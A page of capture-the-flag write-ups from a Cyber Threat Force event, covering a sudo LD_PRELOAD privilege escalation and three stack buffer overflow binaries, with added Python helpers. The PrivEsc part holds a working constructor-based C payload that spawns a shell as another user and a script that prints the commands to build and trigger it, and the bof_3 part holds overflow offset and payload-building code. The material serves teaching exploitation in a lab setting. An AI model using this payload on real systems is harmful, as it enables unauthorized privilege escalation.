Writeup Cyber Threat Force : PrivEsc
For this challenge, we were given SSH access to a machine, as the user ctf. After running sudo -l, we quickly find that we can run the /opt/Ivazov binary as ctf_cracked. The user in question has a flag.txt file in their home, which only they can read.
We also notice env_keep += LD_PRELOAD in the sudo defaults. Because sudo keeps LD_PRELOAD in the environment of the command it launches, a shared library we control gets loaded into /opt/Ivazov, which runs as ctf_cracked, before its main() executes. From there, we can try the classic LD_PRELOAD exploit (it only applies if /opt/Ivazov is dynamically linked, which `file /opt/Ivazov` confirms). The steps taken here are copied from the guide that was just linked.
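As an added illustration of that technique (this is not the writeup's or the linked guide's code), the script below parses `sudo -l` output for the two facts that make the attack work, the kept LD_PRELOAD variable and a rule allowing a command as another user, and prints the commands to type on the box. The `sudo -l` text is a constructed sample: the writeup does not reproduce the real output, so the Defaults line and host name are assumptions; the embedded C library is the standard constructor-based payload.

```python
import re
import textwrap

# Constructed sample of `sudo -l` output for the ctf user. The Defaults line and
# host name are assumptions; the two facts that matter (env_keep+=LD_PRELOAD and
# /opt/Ivazov runnable as ctf_cracked) are the ones the writeup states.
SAMPLE_SUDO_L = """\
Matching Defaults entries for ctf on ctf-box:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User ctf may run the following commands on ctf-box:
    (ctf_cracked) NOPASSWD: /opt/Ivazov
"""

# Shared object whose constructor runs as soon as the dynamic loader maps it into
# the target process, i.e. before main() of /opt/Ivazov, already as ctf_cracked.
# It must be built for the target's architecture (32- or 64-bit) to be loadable.
PRELOAD_SOURCE = textwrap.dedent("""\
    #define _GNU_SOURCE
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor))
    static void pwn(void) {
        unsetenv("LD_PRELOAD");                /* do not re-inject into the shell */
        setresgid(getegid(), getegid(), getegid());
        setresuid(geteuid(), geteuid(), geteuid());
        execl("/bin/sh", "sh", (char *)NULL);  /* shell runs as the sudo target user */
    }
""")

# One sudo rule per line: "(runas) [NOPASSWD:] command"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>\S.*?)\s*$", re.M)


def parse_sudo_l(output):
    """Return (ld_preload_kept, [(runas_user, command), ...]) from `sudo -l` text."""
    kept = re.search(r"env_keep\s*\+=\s*LD_PRELOAD\b", output) is not None
    # "(user : group)" rules carry a group after the colon; only the user matters here.
    rules = [(m.group("runas").split(":")[0].strip(), m.group("cmd"))
             for m in RULE_RE.finditer(output)]
    return kept, rules


def preload_commands(output, src="/tmp/pe.c", so="/tmp/pe.so"):
    """Commands to type on the box, or [] when LD_PRELOAD is not kept by sudo.

    The command is passed exactly as the rule spells it; a rule with arguments
    would have to be invoked with those same arguments.
    """
    kept, rules = parse_sudo_l(output)
    if not kept or not rules:
        return []
    cmds = [f"gcc -fPIC -shared -o {so} {src}"]
    for runas, cmd in rules:
        # sudo accepts VAR=value before the command; env_keep lets LD_PRELOAD through.
        cmds.append(f"sudo -u {runas} LD_PRELOAD={so} {cmd}")
    return cmds


if __name__ == "__main__":
    with open("/tmp/pe.c", "w") as f:
        f.write(PRELOAD_SOURCE)
    for c in preload_commands(SAMPLE_SUDO_L):
        print(c)
```

Once the shell drops as ctf_cracked, `cat /home/ctf_cracked/flag.txt` reads the flag. If sudo had been configured with `env_reset` but without `env_keep+=LD_PRELOAD`, the function returns no commands, which is the situation the check is there to catch.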
Writeup Cyber Threat Force : bof_3
For this challenge, we were also given a service executable. It was hosted remotely.
NOTE: since I'm writing this after the CTF ended, the demos are done locally.
$ checksec ./service
[*] '/home/vivescere/ctf/bof_3/service'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

$ ./service
password:
mypassword
nop

NX is enabled, with partial RELRO, no canary and no PIE (so the binary's addresses are fixed). Let's take a look at the binary using Ghidra:
undefined4 main(void)
{
  ignorMe(&stack0x00000004);
  puts("password: ");
  vuln();
  puts("nop");
  return 0;
}

void vuln(void)
{
  undefined local_70 [104];
  read(0,local_70,0x96);
  return;
}

We have an overflow: read() accepts up to 0x96 (150) bytes into a 104-byte stack buffer with no canary in the way, so the saved return address is within reach. Not much else is going on in the binary.
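The next step after spotting the overflow is to measure it, then to see how much of the 0x96-byte read is left for a payload after the return address. The added example below (my code, not the writeup's) does that with a de Bruijn pattern, the same idea as pwntools' cyclic()/cyclic_find(), but in plain Python so it runs stand-alone. It assumes Ghidra's convention that local_70 sits 0x70 bytes below the return-address slot, so the saved EIP starts at offset 112 of the input; the crash model that feeds the pattern back is constructed here, and the real value is whatever EIP holds when the service crashes under gdb.

```python
import struct
from functools import lru_cache

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
READ_SIZE = 0x96        # read(0, local_70, 0x96) in vuln()
RET_OFFSET = 0x70       # assumption: Ghidra's local_70 is 0x70 bytes below the return address


@lru_cache(maxsize=None)
def _de_bruijn(alphabet=ALPHABET, n=4):
    """de Bruijn sequence B(k, n): every n-byte window appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in out)


def cyclic(length):
    """First `length` bytes of the pattern; feed this to the service to crash it."""
    seq = _de_bruijn()
    if length > len(seq):
        raise ValueError("pattern longer than the de Bruijn sequence")
    return seq[:length]


def cyclic_find(value):
    """Offset of a 4-byte window (bytes, or the little-endian int gdb shows in EIP), or -1."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return _de_bruijn().find(value)


def crash_eip(pattern, ret_offset):
    """Constructed crash model: the dword that lands in the saved EIP for `pattern`."""
    return struct.unpack("<I", pattern[ret_offset:ret_offset + 4])[0]


def p32(x):
    """Pack a 32-bit little-endian word (i386-32-little per checksec)."""
    return struct.pack("<I", x & 0xFFFFFFFF)


def chain_budget(ret_offset=RET_OFFSET, max_len=READ_SIZE):
    """How many 32-bit words fit from the return address onward within one read()."""
    return (max_len - ret_offset) // 4


def build_payload(chain, ret_offset=RET_OFFSET, max_len=READ_SIZE):
    """Padding up to the saved EIP, then the words of `chain`; refuses oversize payloads."""
    payload = b"A" * ret_offset + b"".join(p32(w) for w in chain)
    if len(payload) > max_len:
        raise ValueError(f"payload is {len(payload)} bytes but read() stops at {max_len}")
    return payload


if __name__ == "__main__":
    pat = cyclic(READ_SIZE)
    eip = crash_eip(pat, RET_OFFSET)          # in practice: the EIP value from the crash
    print(f"EIP = {eip:#010x} -> offset {cyclic_find(eip)}")
    print(f"{chain_budget()} words available after the return address")
```

The budget is the number that shapes the rest of the exploit: with the return address at 112 and only 150 bytes read, nine 4-byte words remain, which is why a short chain that first makes the program read more input is the usual way forward for a small bounded read on an NX binary.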
Writeup Cyber Threat Force : bof_2 (with PrivEsc)
For this challenge, we were also given a service executable. It was also hosted remotely.
NOTE: since I'm writing this after the CTF ended, the demos are done locally.
Level 1

$ checksec service
[*] '/home/vivescere/ctf/bof_2/service'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments

$ ./service
Hello authentifie toi !
Username: vivescere
Bienvenue vivescere
password: mypassword
oops i have lost my db sorry

This time, apart from partial RELRO, the only protection that's enabled is PIE, which means the binary's addresses change on every run and will have to be leaked before they can be used. NX is disabled and the binary has RWX segments, so the stack itself is executable.
Writeup Cyber Threat Force : bof_1 (with GetShell & PrivEsc)
For this challenge, we were given a service executable. It was also hosted remotely.
NOTE: since I'm writing this after the CTF ended, the demos are done locally.
Level 1

$ checksec service
[*] '/home/vivescere/ctf/bof_1/service'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

$ ./service
hello who are you?
vivescere
Hello vivescere

We do have NX enabled, along with a stack canary and partial RELRO; there is no PIE, so the binary's own addresses are fixed. Also, the executable is statically linked, so there is no shared libc mapped that we could leak and reuse: whatever libc code we want has to come from the binary itself.
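The three checksec readings above (bof_3, bof_2 and bof_1) are each turned into a plan by the same reasoning: PIE decides whether a leak comes first, NX decides shellcode versus code reuse, the canary decides whether the overwrite can reach the return address at all, and the architecture fixes how addresses are packed. The added example below (my code, not the writeup's) parses the pwntools-style checksec output quoted on this page, embedded here as its sample input, and spells out those constraints; the field names and line layout it expects are those shown above.

```python
import re

# The three checksec outputs quoted in the writeups, embedded as sample input.
CHECKSEC_BOF_3 = """\
[*] '/home/vivescere/ctf/bof_3/service'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
"""

CHECKSEC_BOF_2 = """\
[*] '/home/vivescere/ctf/bof_2/service'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
"""

CHECKSEC_BOF_1 = """\
[*] '/home/vivescere/ctf/bof_1/service'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
"""


def parse_checksec(text):
    """Turn pwntools-style checksec output into booleans, plus the fixed base for non-PIE."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*(\w+):\s*(.+?)\s*$", line)   # the "[*] '/path'" line does not match
        if m:
            fields[m.group(1)] = m.group(2)
    pie = fields["PIE"].startswith("PIE enabled")
    base = None if pie else int(re.search(r"0x[0-9a-fA-F]+", fields["PIE"]).group(), 16)
    return {
        "bits": 64 if "64" in fields["Arch"] else 32,
        "canary": fields["Stack"].startswith("Canary found"),
        "nx": fields["NX"] == "NX enabled",
        "pie": pie,
        "base": base,
        "rwx": "RWX" in fields,
        "relro": fields["RELRO"],
    }


def triage(text):
    """What the protections imply for a stack overflow, in the order they must be solved."""
    p = parse_checksec(text)
    notes = []
    if p["canary"]:
        notes.append("canary: leak it and write it back, or keep the overwrite below it")
    if p["pie"]:
        notes.append("PIE: leak an address before any binary address can be used")
    else:
        notes.append(f"no PIE: binary mapped at 0x{p['base']:x}, its addresses are fixed")
    if p["nx"]:
        notes.append("NX: stack not executable, reuse existing code (ROP / ret2plt) rather than shellcode")
    else:
        segs = " with RWX segments" if p["rwx"] else ""
        notes.append(f"NX disabled{segs}: shellcode on the stack is viable")
    fmt = "<Q" if p["bits"] == 64 else "<I"
    notes.append(f"{p['bits']}-bit: pack addresses with struct format {fmt}")
    return notes


if __name__ == "__main__":
    for name, out in (("bof_3", CHECKSEC_BOF_3), ("bof_2", CHECKSEC_BOF_2), ("bof_1", CHECKSEC_BOF_1)):
        print(name)
        for n in triage(out):
            print("  -", n)
```

Note that checksec says nothing about static linking, which is why the bof_1 writeup states it separately; `file service` or `ldd service` is the check for that.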